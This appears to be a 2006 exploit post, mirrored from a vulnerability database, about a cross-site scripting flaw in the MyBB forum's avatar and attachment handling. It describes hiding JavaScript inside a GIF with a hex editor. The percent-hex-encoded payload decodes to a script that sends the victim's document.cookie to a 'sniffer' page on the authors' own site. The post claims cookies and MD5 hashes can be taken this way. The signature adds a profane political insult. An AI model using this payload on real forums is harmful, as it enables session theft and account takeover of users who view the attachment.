MyBB Html Injection ( XSS )

2006-08-2800:00:00

vulners.com

JSON

################################################

MyBB Have Xss In Avatar And Attachment.php

################################################

HEX editor With GIF picture Open , JS code are writing.


Js Code:Hex:

&amp;3c&#37;73&#37;63&#37;72&#37;69&#37;70&#37;74&#37;3e&#37;69&#37;6d&#37;67&#37;20&#37;3d&#37;20&#37;6e&#37;65&#37;77&#37;20&#37;49&#37;6d&#37;61&#37;67&#37;65&#37;28&#37;29&#37;3b&#37;20&#37;69&#37;6d&#37;67&#37;2e&#37;73&#37;72&#37;63&#37;20&#37;3d&#37;20&#37;22&#37;68&#37;74&#37;74&#37;70&#37;3a&#37;2f&#37;2f&#37;77&#37;77&#37;77&#37;2e&#37;68&#37;61&#37;79&#37;6c&#37;61&#37;7a&#37;6c&#37;61&#37;72&#37;2e&#37;6f&#37;72&#37;67&#37;2f&#37;73&#37;6e&#37;69&#37;66&#37;66&#37;65&#37;72&#37;2f&#37;73&#37;2e&#37;70&#37;68&#37;70&#37;3f&#37;22&#37;2b&#37;64&#37;6f&#37;63&#37;75&#37;6d&#37;65&#37;6e&#37;74&#37;2e&#37;63&#37;6f&#37;6f&#37;6b&#37;69&#37;65&#37;3b&#37;3c&#37;2f&#37;73&#37;63&#37;72&#37;69&#37;70&#37;74&#37;3e

#################################################

We are joining official to the page,but Attachment do.and attachment taking the address.

http://Site/MyBB/attachment.php?aid=?

Cookies , MD5 able to take

Redworm || ZeberuS

Redworm (at) Redworm (dot) Us [email concealed] || ZeberuS (at) ZeberuS (dot) com [email concealed]

Kahrolsun Pkk Aq

No War Israel ! Stop War !

wWw.Haylazlar.Org

JSON

MyBB Html Injection &#40; XSS &#41;

MyBB Html Injection ( XSS )